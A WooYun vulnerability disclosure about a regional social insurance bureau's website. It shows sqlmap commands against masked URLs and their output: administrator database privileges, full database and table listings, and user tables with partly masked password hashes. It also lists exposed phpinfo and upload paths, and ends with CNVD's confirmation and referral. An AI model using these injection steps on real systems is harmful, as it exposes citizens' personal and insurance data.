漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0136985
漏洞标题:某社保事业局SQL注入(administrator权限)+信息泄露+目录遍历
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2015-08-28 08:56
修复时间:2015-10-12 15:58
公开时间:2015-10-12 15:58
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-28: 细节已通知厂商并且等待厂商处理中
2015-08-28: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开
简要描述:
由于过滤不严格,导致SQL注入,可打数据库。。还有信息泄露+文件遍历
详细说明:
第一处注入:
c:\Python27\sqlmap>python sqlmap.py -u "**.**.**.**/xwzx_xx.php?id=1285"
database management system users privileges:
[*] ''@'linux' [1]:
privilege: USAGE
[*] ''@'localhost' [1]:
privilege: USAGE
[*] 'pma'@'localhost' [1]:
privilege: USAGE
[*] 'root'@'linux' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'sbj'@'%' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[11:08:41] [INFO] fetching tables for databases:
, hg, information_schema, mysql, mysql1, mysql2,
renyuan, sbj, shebaoju, test, webauth'
[11:08:41] [INFO] the SQL query used returns 368
Database: cdcol
[1 table]
+----------------------------------------------+
| cds |
+----------------------------------------------+
Database: mysql1
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: mysql2
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: hainanshebao2014
[55 tables]
+----------------------------------------------+
| modeltregab01_old_10-10 |
| modeltregac01_old_10-10 |
| aa10 |
| ab01 |
| ab02 |
| ab16 |
| article |
| article_class |
| banner |
| banner_class |
| bingzhong |
| canbao |
| cbab01 |
| cnit_admin |
| cnit_links |
| cnit_mibao |
| cnit_question |
| cnit_website |
| danwei |
| down_class |
| downxx |
| dtproperties |
| jigou |
| jingban |
| ka02 |
| ka03 |
| ka06 |
| lingdao |
| message |
| message_yjx |
| modeltarticle |
| modeltbasecode |
| modeltinterlinkage |
| modeltmessageboard |
| modeltoperatelog |
| modeltoperators |
| modeltregab01 |
| modeltregac01 |
| modeltregac01_old |
| news |
| news_big |
| news_small |
| products |
| products_class |
| qikan |
| qikanclass |
| quanxian |
| role |
| role_quanxian |
| sb_dcsj |
| shipin |
| yaodian |
| yaopin |
| yiyuan |
| zhenliao |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: phpmyadmin
[12 tables]
+----------------------------------------------+
| pma_bookmark |
| pma_column_info |
| pma_designer_coords |
| pma_history |
| pma_pdf_pages |
| pma_recent |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| pma_table_uiprefs |
| pma_tracking |
| pma_userconfig |
+----------------------------------------------+
Database: shebaoju
[63 tables]
+----------------------------------------------+
| -- |
| aa10 |
| ab01 |
| ab02 |
| ab16 |
| ac01 |
| ac02 |
| ac04 |
| article |
| article_class |
| banner |
| banner_class |
| bingzhong |
| canbao |
| cbab01 |
| cnit_admin |
| cnit_links |
| cnit_mibao |
| cnit_question |
| cnit_website |
| danwei |
| down_class |
| downxx |
| dtproperties |
| ic02 |
| ic14 |
| ic17 |
| ic43 |
| ic50 |
| jigou |
| jingban |
| ka02 |
| ka03 |
| ka06 |
| kc04 |
| kc17 |
| kc24 |
| kc50 |
| lc17 |
| lingdao |
| message |
| modeltarticle |
| modeltbasecode |
| modeltinterlinkage |
| modeltmessageboard |
| modeltoperatelog |
| modeltoperators |
| modeltregab01 |
| modeltregac01 |
| news |
| news_big |
| news_small |
| products |
| products_class |
| qikan |
| quanxian |
| role |
| role_quanxian |
| shipin |
| yaodian |
| yaopin |
| yiyuan |
| zhenliao |
+----------------------------------------------+
Database: renyuan
[1 table]
+----------------------------------------------+
| modeltregac01 |
+----------------------------------------------+
Database: webauth
[1 table]
+----------------------------------------------+
| user_pwd |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: sbj
[2 tables]
+----------------------------------------------+
| ac01 |
| ac01_copy |
+----------------------------------------------+
Database: hg
[48 tables]
+----------------------------------------------+
| 123 |
| aa10 |
| ab01 |
| ab02 |
| ac01 |
| ac02 |
| ac04 |
| article |
| article_class |
| banner |
| banner_class |
| bingzhong |
| canbao |
| cnit_admin |
| cnit_links |
| cnit_website |
| danwei |
| down_class |
| downxx |
| ic02 |
| ic14 |
| ic17 |
| ic43 |
| ic50 |
| jigou |
| jingban |
| kc04 |
| kc17 |
| kc24 |
| kc50 |
| lc17 |
| lingdao |
| message |
| modeltregab01 |
| modeltregac01 |
| news |
| news_big |
| news_small |
| products |
| products_class |
| qikan |
| qikanclass |
| shipin |
| test |
| yaodian |
| yaopin |
| yiyuan |
| zhenliao |
+----------------------------------------------+
Database: ghfhj
[56 tables]
+----------------------------------------------+
| aa10 |
| ab01 |
| ab02 |
| ac01 |
| ac02 |
| ac04 |
| article |
| article_class |
| banner |
| banner_class |
| bingzhong |
| canbao |
| cbab01 |
| cnit_admin |
| cnit_links |
| cnit_website |
| danwei |
| down_class |
| downxx |
| dtproperties |
| ic02 |
| ic14 |
| ic17 |
| ic43 |
| ic50 |
| jigou |
| jingban |
| ka02 |
| ka03 |
| ka06 |
| kc04 |
| kc17 |
| kc24 |
| kc50 |
| lc17 |
| lingdao |
| message |
| modeltarticle |
| modeltbasecode |
| modeltinterlinkage |
| modeltmessageboard |
| modeltoperatelog |
| modeltoperators |
| modeltregab01 |
| modeltregac01 |
| news_big |
| news_small |
| products |
| products_class |
| qikan |
| qikanclass |
| shipin |
| yaodian |
| yaopin |
| yiyuan |
| zhenliao |
+----------------------------------------------+
Database: mysql
Table: user
[6 entries]
+-----------+---------+----------------------------------------------------+
| Host | User | Password |
+-----------+---------+----------------------------------------------------+
| localhost | root | <blank> |
| linux | root | <blank> |
| localhost | <blank> | <blank> |
| linux | <blank> | <blank> |
| localhost | pma | <blank> |
| % | sbj | *6BB4837EB743***05EE4568DDA7********************** |
+-----------+---------+----------------------------------------------------+
Database: mysql2
Table: user
[3 entries]
+-----------------+---------+----------------------------------+
| Host | User | Password |
+-----------------+---------+----------------------------------+
| localhost | root | b876f0ae586e****6923a61542366a1 |
| server-cbd33c70 | root | <blank> |
| localhost | <blank> | <blank> |
+-----------------+---------+----------------------------------+
Database: webauth
Table: user_pwd
[1 entry]
+-------+-------+
| name | pass |
+-------+-------+
| xampp | ******|
+-------+-------+
第二处注入:
c:\Python27\sqlmap>python sqlmap.py -u "http://**.**.**.**/xwzx.php?classid
=1"
信息泄露+文件遍历:
Phpinfo配置信息泄露
http://**.**.**.**/phpinfo.php
http://**.**.**.**/test.php
http://**.**.**.**/aa.php
http://**.**.**.**/upload/
http://**.**.**.**/public/
http://**.**.**.**/Client.php
漏洞证明:
RT
修复方案:
严格过滤,现在目录访问权限
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2015-08-28 15:56
厂商回复:
CNVD确认所述情况,已经转由CNCERT下发给海南分中心,由其后续协调网站管理单位处置。
最新状态:
暂无